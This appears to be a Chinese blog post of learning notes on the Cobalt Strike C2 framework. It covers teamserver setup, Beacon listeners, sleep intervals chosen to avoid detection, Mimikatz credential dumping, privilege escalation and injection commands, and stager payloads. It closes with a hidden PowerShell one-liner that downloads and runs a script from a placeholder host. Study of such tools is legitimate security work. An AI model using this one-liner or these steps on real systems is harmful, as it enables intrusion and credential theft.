<!doctype html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="description" content="白尾青芳の小窝">
  <title>Cobalt Strike | 白尾青芳の小窝</title>
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;600;700&family=Space+Grotesk:wght@500;600&display=swap" rel="stylesheet">
  <link rel="stylesheet" href="/css/styles.css?v=20260722-2148">
<meta name="generator" content="Hexo 8.1.1"></head>
<body>
  <video class="backdrop" autoplay muted loop playsinline preload="auto" aria-hidden="true">
    <source src="/images/wallpaper.mp4" type="video/mp4">
  </video>

  <button class="mobile-menu" id="menuToggle" type="button" aria-label="打开导航" aria-expanded="false">
    <span></span><span></span><span></span>
  </button>

  <aside class="sidebar" id="sidebar">
    <div class="profile">
      <img class="avatar" src="/images/fox-avatar.jpg" alt="白尾青芳头像">
      <p class="eyebrow">SECURITY · CODE · NOTES</p>
      <h1>白尾青芳</h1>
      <p class="motto">在每一次请求与响应之间，找到系统真实的边界。</p>
    </div>

    <nav class="main-nav" aria-label="主导航">
      <a class="" href="/"><i data-lucide="home"></i><span>博客首页</span></a>
      <a class="" href="/study/"><i data-lucide="book-open"></i><span>学习导航</span></a>
      <a href="/categories/Web-%E5%AE%89%E5%85%A8/"><i data-lucide="shield-check"></i><span>Web 安全</span></a>
      <a href="/categories/%E5%BC%80%E5%8F%91%E7%AC%94%E8%AE%B0/"><i data-lucide="code-2"></i><span>开发笔记</span></a>
      <a class="" href="/archives/"><i data-lucide="archive"></i><span>文章归档</span></a>
      <a href="/about/"><i data-lucide="user-round"></i><span>关于我</span></a>
    </nav>

    <div class="sidebar-footer">
      <div class="social-links">
        <a target="_blank" rel="noopener" href="https://github.com/baiweiqingfang" aria-label="GitHub" title="GitHub"><svg viewBox="0 0 24 24" aria-hidden="true"><path fill="currentColor" d="M12 .5C5.65.5.5 5.65.5 12c0 5.1 3.29 9.43 7.86 10.96.58.1.79-.25.79-.56v-2.14c-3.2.7-3.87-1.36-3.87-1.36-.52-1.34-1.28-1.7-1.28-1.7-1.05-.72.08-.7.08-.7 1.16.08 1.77 1.2 1.77 1.2 1.03 1.76 2.7 1.25 3.36.96.1-.75.4-1.25.73-1.54-2.55-.29-5.24-1.28-5.24-5.68 0-1.25.45-2.28 1.19-3.08-.12-.29-.52-1.46.11-3.04 0 0 .97-.31 3.17 1.18.92-.26 1.9-.38 2.88-.39.98 0 1.96.13 2.88.39 2.2-1.49 3.16-1.18 3.16-1.18.63 1.58.23 2.75.11 3.04.74.8 1.19 1.83 1.19 3.08 0 4.42-2.69 5.39-5.25 5.67.41.36.78 1.06.78 2.14v3.17c0 .31.21.67.8.56A11.5 11.5 0 0 0 23.5 12C23.5 5.65 18.35.5 12 .5Z"/></svg></a>
        <a href="/atom.xml" aria-label="RSS" title="RSS"><i data-lucide="rss"></i></a>
      </div>
      <p>© 2026 白尾青芳 · Powered by Hexo</p>
    </div>
  </aside>

  <main class="content">
    <article class="article-page">
  <header class="article-header">
    <p class="eyebrow">learning</p>
    <h1>Cobalt Strike</h1>
    <div class="post-meta">
      <time datetime="2026-04-25T12:13:02.000Z">2026.04.25</time>
      <span>3 分钟阅读</span>
    </div>
  </header>
  <div class="article-content">
    <h1 id="Cobalt-Strike"><a href="#Cobalt-Strike" class="headerlink" title="Cobalt Strike"></a>Cobalt Strike</h1><p>在kali中配置服务器，在Windows物理机上配置客户端</p>
<p>Kali：</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cd CobaltStrike4.8 </span><br><span class="line">sudo ./teamserver 192.168.243.129 &quot;kali&quot;  </span><br></pre></td></tr></table></figure>

<p>Windows：</p>
<p><img src="C:\Users\23214\AppData\Roaming\Typora\typora-user-images\image-20260410211818136.png" alt="image-20260410211818136"></p>
<h2 id="team-server"><a href="#team-server" class="headerlink" title="team server"></a>team server</h2><p>Cobalt Strike 中的Payloads的主控制器，记录了Cobalt Strike 中发生的所有事件，收集在后渗透阶段发现的或攻击者在目标系统上登录时使用的所有凭据。</p>
<h2 id="监听器"><a href="#监听器" class="headerlink" title="监听器"></a>监听器</h2><p>Beacon为内置的Listener,包含DNS、HTTP、HTTPS、SMB。</p>
<p>Foreign 为外部结合的Listener,</p>
<h3 id="Beacon"><a href="#Beacon" class="headerlink" title="Beacon"></a>Beacon</h3><p>Beacon就是一个和目标进行交互的东西，支持异步通信和交互式通信</p>
<p>Beancon回连速度：</p>
<table>
<thead>
<tr>
<th>场景</th>
<th>配置示例</th>
<th>命令响应时间</th>
<th>适用阶段</th>
</tr>
</thead>
<tbody><tr>
<td>sleep 0</td>
<td>sleep 0</td>
<td>1~3 秒</td>
<td>仅实验&#x2F;紧急提权（极易检测）</td>
</tr>
<tr>
<td>快速调试</td>
<td>sleep 5 10</td>
<td>3~10 秒</td>
<td>内网测试&#x2F;漏洞验证</td>
</tr>
<tr>
<td>标准红队</td>
<td>sleep 60 20</td>
<td>40~80 秒</td>
<td>生产环境潜伏（推荐）</td>
</tr>
<tr>
<td>DNS&#x2F;慢速 C2</td>
<td>sleep 300 30</td>
<td>4~6 分钟</td>
<td>高对抗环境&#x2F;长期驻留</td>
</tr>
<tr>
<td>强制立即回连</td>
<td>checkin</td>
<td>立即（1次）</td>
<td>临时拉取结果，不改变 sleep</td>
</tr>
</tbody></table>
<h4 id="Access"><a href="#Access" class="headerlink" title="Access"></a>Access</h4><h5 id="Run-Mimikatz"><a href="#Run-Mimikatz" class="headerlink" title="Run Mimikatz"></a>Run Mimikatz</h5><p>从内存中提取明文密码、Hash、PIN码和Kerberos票据</p>
<h4 id="Explore"><a href="#Explore" class="headerlink" title="Explore"></a>Explore</h4><p>Port Scan</p>
<p>探测内网存活主机，并对存活主机进行端口扫描</p>
<h3 id="Beacon菜单"><a href="#Beacon菜单" class="headerlink" title="Beacon菜单"></a>Beacon菜单</h3><p>getsystem</p>
<p>一键获得system权限</p>
<p>getuid                 </p>
<p>获取用户ID</p>
<p>inject</p>
<p>将木马程序注入到进程中，会生成一个新的木马</p>
<p>用法: inject [pid] &lt;x86|x64&gt; [listener]</p>
<p>net view  </p>
<p>查看局域网内其他主机名</p>
<p>net view &#x2F;domain</p>
<p>查看有几个域</p>
<p>ps</p>
<p>显示进程列表</p>
<p>shell</p>
<p>shell是Beacon 的基础系统命令执行器，用于在目标主机上调用默认命令行解释器（Windows 为 cmd.exe，Linux 为 &#x2F;bin&#x2F;sh）执行任意命令，并将输出结果异步回传</p>
<p>它不是实时交互Shell，而是一次性命令下发+结果回传机制。</p>
<h2 id="Main-Menu"><a href="#Main-Menu" class="headerlink" title="Main Menu"></a>Main Menu</h2><h3 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h3><h4 id="Windows-Stager-Payload"><a href="#Windows-Stager-Payload" class="headerlink" title="Windows Stager Payload"></a>Windows Stager Payload</h4><p>Windows分阶段载荷生成的是一段非常小的代码，主要作用：</p>
<p>1.主动连接到你CS 服务端</p>
<p>2.从服务端拉取真正的、功能完整的Beacon核心（Stage）。</p>
<p>3.将下载下来的核心代码直接加载进内存中运行。</p>
<h3 id="Attacks"><a href="#Attacks" class="headerlink" title="Attacks"></a>Attacks</h3><h4 id="Scripted-Web-Delivery-S"><a href="#Scripted-Web-Delivery-S" class="headerlink" title="Scripted Web Delivery (S)"></a>Scripted Web Delivery (S)</h4><p>无文件投递，一种利用系统原生工具远程加载恶意脚本到内存执行的技术</p>
<p>工作原理：</p>
<p>1.架设临时服务器：CS 在主机上开启了一个简易的 HTTP 服务。</p>
<p>2.托管 Payload：这个 URL 对应的内容不是网页，而是一段经过Base64 加密的脚本（通常是用来加载 Beacon 核心代码的 Loader）。</p>
<p>3.生成一行命令（One-Liner）：</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&#x27;http://IP/path&#x27;))&quot;</span><br></pre></td></tr></table></figure>






  </div>
</article>

  </main>

  <button class="back-to-top" id="backToTop" type="button" aria-label="回到顶部"><i data-lucide="arrow-up"></i></button>
  <script src="https://unpkg.com/lucide@latest/dist/umd/lucide.min.js"></script>
  <script src="/js/main.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>




